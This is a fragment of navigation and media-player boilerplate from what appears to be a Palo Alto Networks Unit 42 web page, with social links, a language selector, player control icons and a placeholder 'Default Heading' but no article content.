* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
